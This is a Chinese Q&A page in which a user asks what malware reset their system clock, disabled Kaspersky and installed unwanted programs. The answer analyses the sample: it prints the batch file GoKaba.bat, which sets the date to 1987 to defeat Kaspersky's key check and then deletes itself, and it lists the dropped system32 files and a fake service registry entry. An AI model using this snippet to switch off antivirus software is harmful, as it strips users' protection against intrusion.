UC知道通过更改系统时间来禁用卡比斯基那是什么病毒呀!!!
来源:百度知道 编辑:UC知道 时间:2024/07/03 00:38:46
昨天系统不知道怎么回事卡巴斯基突然提示key文件时间错误!!卡巴斯基的保护就停止了,且系统开始自动安装一些恶意软件,我马上断网但是可能已经晚了。 一看系统时间为1992年。我在bios下和系统下更改成正确时间都无效!!卡巴斯基都是无法正常运行。且在msconfig下将那些恶意软件的启动项关闭,可重新启动后他们仍然运行。被逼无奈只好重做系统!! 我只想问一下这是什么恶意软件或病毒谢谢!!!告诉名字就可以。不要解决办法谢谢
一个对付卡巴的病毒
卡巴的用户,系统时间全部改为1987-10-18
样本动作
判断用户机子是否装卡巴(KIS/KAV)
如果安装
释放
GoKaba.bat
文件内容
CODE:
@echo off
set date=%date%
date 1987-10-18
ping -n 45 localhost > nul
date %date%
del %0
[Copy to clipboard]
=>将系统时间调整为1987-10-18
卡巴的监控立刻失效
成功完成K.O.卡巴后
---------------------------------------------------------------------------------------------
以下为所有机子状况
释放文件
%SystemRoot%\system32\*.EXE
%SystemRoot%\system32\*T.EXE
%SystemRoot%\system32\*.DLL
%SystemRoot%\system32\delme.bat
* =随机8位字母(如7F9DE518\312E0FDA)
注册表变化
添加伪系统服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "DisplayName" = *
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Description" = 为系统提供加速启动功能(d-sp1)。